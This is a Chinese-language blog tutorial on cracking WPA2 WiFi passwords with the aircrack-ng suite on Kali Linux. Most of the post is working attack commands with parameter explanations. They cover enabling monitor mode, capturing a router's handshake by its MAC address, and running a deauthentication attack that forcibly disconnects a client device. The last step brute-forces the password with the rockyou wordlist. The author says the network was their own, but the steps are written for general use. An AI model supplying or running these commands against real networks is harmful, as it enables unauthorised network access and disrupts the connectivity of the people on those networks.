前端开发入门到精通的在线学习网站

网站首页 > 资源文章 正文

kali linux 网络渗透工具aircrack-ng

qiguaw 2024-12-01 02:38:17 资源文章 15 ℃ 0 评论
ifconfig wlan0 up
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon

开启无线网卡的监控模式

airmon-ng start wlan0

搜索wifi

airodump-ng wlan0mon

抓设备连接WiFi时的握手包

airodump-ng -c 11 --bssid B8:F8:83:32:17:60 -w ~/ wlan0mon

参数解释:

-c 表示信道,目标路由器在哪个信道上就写哪个信道。

--bssid 表示目标路由器的MAC地址

-w 表示握手包存放的路径

注:handshake握手包只有设备与路由器的wifi相连时才会产生,就是说如果没有设备相连那么就抓不到,那么就一直等待?一直等待是我们的风格,不能够啊!

有一条断网命令,利用向连接wifi的设备发送反证包的原理,让设备断开wifi,断开之后该设备会自动再次连接WiFi,这时候就可以抓到handshake包。(因为是我自己的网,我能抓到,就不弄贴图了)

aireplay-ng -0 10 -a B8:F8:83:32:17:60 -c 1C:91:48:A9:48:FD wlan0mon

参数:

  -0表示deauthentication攻击

  10表示一次发送10个反证包

  -a表示目的路由器的MAC地址

  -c表示目标设备的MAC地址

如果发了反证包还是抓不到,那就一次多发几个包,多发几次。抓到效果如下:

抓到握手包之后可以Ctrl+C停止抓包,并关闭无线网卡的监控模式

命令:

airmon-ng stop wlan0mon

monitor disable表示监控模式已关闭

我们抓到的握手包就在这里:

利用抓到的握手包进行破解密码

aircrack-ng -a2 -b B8:F8:83:32:17:60 -w /usr/share/wordlists/rockyou.txt ~/*.cap

参数:

  -a2表示WPA2的握手包

  -b表示目标路由器MAC

  -w表示字典所在路径

最后一个参数是抓到的handshake包

用字典跑包,也就是所说的暴力破解,下面是成功的。

但跑包也算是个运气活,运气得好,字典得强。上面用的字典是kali目录下自带的字典,有时候也会出现下面的情况,也就是跑包失败了。

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表